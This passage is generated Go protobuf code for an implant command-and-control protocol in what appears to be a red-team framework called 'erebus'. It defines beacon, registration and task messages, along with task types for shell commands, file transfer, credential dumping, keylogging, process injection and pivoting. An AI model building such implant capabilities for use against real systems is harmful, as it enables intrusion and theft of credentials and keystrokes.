	return mi.MessageOf(x)
}

// Deprecated: Use ModuleTask.ProtoReflect.Descriptor instead.
func (*ModuleTask) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{15}
}

func (x *ModuleTask) GetModuleName() string {
	if x != nil {
		return x.ModuleName
	}
	return ""
}

func (x *ModuleTask) GetConfig() []byte {
	if x != nil {
		return x.Config
	}
	return nil
}

var File_c2_proto protoreflect.FileDescriptor

const file_c2_proto_rawDesc = "" +
	"\n" +
	"\bc2.proto\x12\terebus.c2\"\xf2\x01\n" +
	"\bRegister\x12\x1d\n" +
	"\n" +
	"implant_id\x18\x01 \x01(\tR\timplantId\x12\x1a\n" +
	"\bhostname\x18\x02 \x01(\tR\bhostname\x12\x1a\n" +
	"\busername\x18\x03 \x01(\tR\busername\x12\x0e\n" +
	"\x02os\x18\x04 \x01(\tR\x02os\x12\x12\n" +
	"\x04arch\x18\x05 \x01(\tR\x04arch\x12\x10\n" +
	"\x03pid\x18\x06 \x01(\rR\x03pid\x12'\n" +
	"\x0fintegrity_level\x18\a \x01(\tR\x0eintegrityLevel\x12\x1c\n" +
	"\ttimestamp\x18\b \x01(\x03R\ttimestamp\x12\x12\n" +
	"\x04hmac\x18\t \x01(\fR\x04hmac\"\xa7\x01\n" +
	"\x10RegisterResponse\x12\x18\n" +
	"\asuccess\x18\x01 \x01(\bR\asuccess\x12\x1d\n" +
	"\n" +
	"session_id\x18\x02 \x01(\tR\tsessionId\x12&\n" +
	"\x0fnext_checkin_ms\x18\x03 \x01(\x03R\rnextCheckinMs\x122\n" +
	"\x15encrypted_session_key\x18\x04 \x01(\fR\x13encryptedSessionKey\"\xd6\x01\n" +
	"\x06Beacon\x12\x1d\n" +
	"\n" +
	"implant_id\x18\x01 \x01(\tR\timplantId\x12\x1d\n" +
	"\n" +
	"session_id\x18\x02 \x01(\tR\tsessionId\x12\x1c\n" +
	"\ttimestamp\x18\x03 \x01(\x03R\ttimestamp\x12\x12\n" +
	"\x04hmac\x18\x04 \x01(\fR\x04hmac\x12/\n" +
	"\aresults\x18\x05 \x03(\v2\x15.erebus.c2.TaskResultR\aresults\x12+\n" +
	"\x11encrypted_results\x18\x06 \x01(\fR\x10encryptedResults\"\xa6\x01\n" +
	"\x0eBeaconResponse\x12%\n" +
	"\x05tasks\x18\x01 \x03(\v2\x0f.erebus.c2.TaskR\x05tasks\x12&\n" +
	"\x0fnext_checkin_ms\x18\x02 \x01(\x03R\rnextCheckinMs\x12\x1c\n" +
	"\tterminate\x18\x03 \x01(\bR\tterminate\x12'\n" +
	"\x0fencrypted_tasks\x18\x04 \x01(\fR\x0eencryptedTasks\"\xa3\x01\n" +
	"\x04Task\x12\x17\n" +
	"\atask_id\x18\x01 \x01(\tR\x06taskId\x12\x1d\n" +
	"\n" +
	"implant_id\x18\x02 \x01(\tR\timplantId\x120\n" +
	"\ttask_type\x18\x03 \x01(\x0e2\x13.erebus.c2.TaskTypeR\btaskType\x12\x12\n" +
	"\x04data\x18\x04 \x01(\fR\x04data\x12\x1d\n" +
	"\n" +
	"timeout_ms\x18\x05 \x01(\x03R\ttimeoutMs\"\x95\x01\n" +
	"\n" +
	"TaskResult\x12\x17\n" +
	"\atask_id\x18\x01 \x01(\tR\x06taskId\x12\x18\n" +
	"\asuccess\x18\x02 \x01(\bR\asuccess\x12\x12\n" +
	"\x04data\x18\x03 \x01(\fR\x04data\x12\x14\n" +
	"\x05error\x18\x04 \x01(\tR\x05error\x12*\n" +
	"\x11execution_time_ms\x18\x05 \x01(\x03R\x0fexecutionTimeMs\"G\n" +
	"\x14BeaconResultsPayload\x12/\n" +
	"\aresults\x18\x01 \x03(\v2\x15.erebus.c2.TaskResultR\aresults\";\n" +
	"\x12BeaconTasksPayload\x12%\n" +
	"\x05tasks\x18\x01 \x03(\v2\x0f.erebus.c2.TaskR\x05tasks\"9\n" +
	"\tShellTask\x12\x18\n" +
	"\acommand\x18\x01 \x01(\tR\acommand\x12\x12\n" +
	"\x04args\x18\x02 \x03(\tR\x04args\"Z\n" +
	"\vShellResult\x12\x16\n" +
	"\x06stdout\x18\x01 \x01(\tR\x06stdout\x12\x16\n" +
	"\x06stderr\x18\x02 \x01(\tR\x06stderr\x12\x1b\n" +
	"\texit_code\x18\x03 \x01(\x05R\bexitCode\"3\n" +
	"\x10FileDownloadTask\x12\x1f\n" +
	"\vremote_path\x18\x01 \x01(\tR\n" +
	"remotePath\"D\n" +
	"\x12FileDownloadResult\x12\x1a\n" +
	"\bfilename\x18\x01 \x01(\tR\bfilename\x12\x12\n" +
	"\x04data\x18\x02 \x01(\fR\x04data\"E\n" +
	"\x0eFileUploadTask\x12\x1f\n" +
	"\vremote_path\x18\x01 \x01(\tR\n" +
	"remotePath\x12\x12\n" +
	"\x04data\x18\x02 \x01(\fR\x04data\",\n" +
	"\x10FileUploadResult\x12\x18\n" +
	"\asuccess\x18\x01 \x01(\bR\asuccess\"E\n" +
	"\tSleepTask\x12\x19\n" +
	"\bsleep_ms\x18\x01 \x01(\x03R\asleepMs\x12\x1d\n" +
	"\n" +
	"jitter_pct\x18\x02 \x01(\x05R\tjitterPct\"E\n" +
	"\n" +
	"ModuleTask\x12\x1f\n" +
	"\vmodule_name\x18\x01 \x01(\tR\n" +
	"moduleName\x12\x16\n" +
	"\x06config\x18\x02 \x01(\fR\x06config*\xcc\x03\n" +
	"\bTaskType\x12\x10\n" +
	"\fTASK_UNKNOWN\x10\x00\x12\x0e\n" +
	"\n" +
	"TASK_SHELL\x10\x01\x12\x16\n" +
	"\x12TASK_FILE_DOWNLOAD\x10\x02\x12\x14\n" +
	"\x10TASK_FILE_UPLOAD\x10\x03\x12\x15\n" +
	"\x11TASK_PROCESS_LIST\x10\x04\x12\x15\n" +
	"\x11TASK_PROCESS_KILL\x10\x05\x12\x15\n" +
	"\x11TASK_NET_IFCONFIG\x10\x06\x12\x15\n" +
	"\x11TASK_NET_PORTSCAN\x10\a\x12\x13\n" +
	"\x0fTASK_CREDS_DUMP\x10\b\x12\x13\n" +
	"\x0fTASK_SCREENSHOT\x10\t\x12\x15\n" +
	"\x11TASK_KEYLOG_START\x10\n" +
	"\x12\x14\n" +
	"\x10TASK_KEYLOG_STOP\x10\v\x12\x14\n" +
	"\x10TASK_KEYLOG_DUMP\x10\f\x12\x14\n" +
	"\x10TASK_PIVOT_START\x10\r\x12\x13\n" +
	"\x0fTASK_PIVOT_STOP\x10\x0e\x12\x0f\n" +
	"\vTASK_INJECT\x10\x0f\x12\x10\n" +
	"\fTASK_PE_LOAD\x10\x10\x12\x14\n" +
	"\x10TASK_SOCKS_START\x10\x11\x12\x13\n" +
	"\x0fTASK_SOCKS_STOP\x10\x12\x12\r\n" +
	"\tTASK_EXIT\x10\x13\x12\x0e\n" +
	"\n" +
	"TASK_SLEEP\x10\x14\x12\x0f\n" +
	"\vTASK_MODULE\x10\x15B5Z3github.com/KKingZero/erebus-exploit-framwork/pkg/pbb\x06proto3"

var (
	file_c2_proto_rawDescOnce sync.Once
	file_c2_proto_rawDescData []byte
)

func file_c2_proto_rawDescGZIP() []byte {
	file_c2_proto_rawDescOnce.Do(func() {
		file_c2_proto_rawDescData = protoimpl.X.CompressGZIP(unsafe.Slice(unsafe.StringData(file_c2_proto_rawDesc), len(file_c2_proto_rawDesc)))
	})
	return file_c2_proto_rawDescData
}

var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 1)
var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 16)
var file_c2_proto_goTypes = []any{
	(TaskType)(0),                // 0: erebus.c2.TaskType
	(*Register)(nil),             // 1: erebus.c2.Register
	(*RegisterResponse)(nil),     // 2: erebus.c2.RegisterResponse
	(*Beacon)(nil),               // 3: erebus.c2.Beacon
	(*BeaconResponse)(nil),       // 4: erebus.c2.BeaconResponse
	(*Task)(nil),                 // 5: erebus.c2.Task
	(*TaskResult)(nil),           // 6: erebus.c2.TaskResult
	(*BeaconResultsPayload)(nil), // 7: erebus.c2.BeaconResultsPayload
	(*BeaconTasksPayload)(nil),   // 8: erebus.c2.BeaconTasksPayload
	(*ShellTask)(nil),            // 9: erebus.c2.ShellTask
	(*ShellResult)(nil),          // 10: erebus.c2.ShellResult
	(*FileDownloadTask)(nil),     // 11: erebus.c2.FileDownloadTask
	(*FileDownloadResult)(nil),   // 12: erebus.c2.FileDownloadResult
	(*FileUploadTask)(nil),       // 13: erebus.c2.FileUploadTask
	(*FileUploadResult)(nil),     // 14: erebus.c2.FileUploadResult
	(*SleepTask)(nil),            // 15: erebus.c2.SleepTask
	(*ModuleTask)(nil),           // 16: erebus.c2.ModuleTask
}
var file_c2_proto_depIdxs = []int32{
	6, // 0: erebus.c2.Beacon.results:type_name -> erebus.c2.TaskResult
	5, // 1: erebus.c2.BeaconResponse.tasks:type_name -> erebus.c2.Task
	0, // 2: erebus.c2.Task.task_type:type_name -> erebus.c2.TaskType
	6, // 3: erebus.c2.BeaconResultsPayload.results:type_name -> erebus.c2.TaskResult
	5, // 4: erebus.c2.BeaconTasksPayload.tasks:type_name -> erebus.c2.Task
	5, // [5:5] is the sub-list for method output_type
	5, // [5:5] is the sub-list for method input_type
	5, // [5:5] is the sub-list for extension type_name
	5, // [5:5] is the sub-list for extension extendee
	0, // [0:5] is the sub-list for field type_name
}

func init() { file_c2_proto_init() }
func file_c2_proto_init() {
	if File_c2_proto != nil {
		return
	}
	type x struct{}
	out := protoimpl.TypeBuilder{
		File: protoimpl.DescBuilder{
			GoPackagePath: reflect.TypeOf(x{}).PkgPath(),
			RawDescriptor: unsafe.Slice(unsafe.StringData(file_c2_proto_rawDesc), len(file_c2_proto_rawDesc)),
			NumEnums:      1,
			NumMessages:   16,
			NumExtensions: 0,
			NumServices:   0,
		},
		GoTypes:           file_c2_proto_goTypes,
		DependencyIndexes: file_c2_proto_depIdxs,
		EnumInfos:         file_c2_proto_enumTypes,
		MessageInfos:      file_c2_proto_msgTypes,
	}.Build()
	File_c2_proto = out.File
	file_c2_proto_goTypes = nil
	file_c2_proto_depIdxs = nil
}
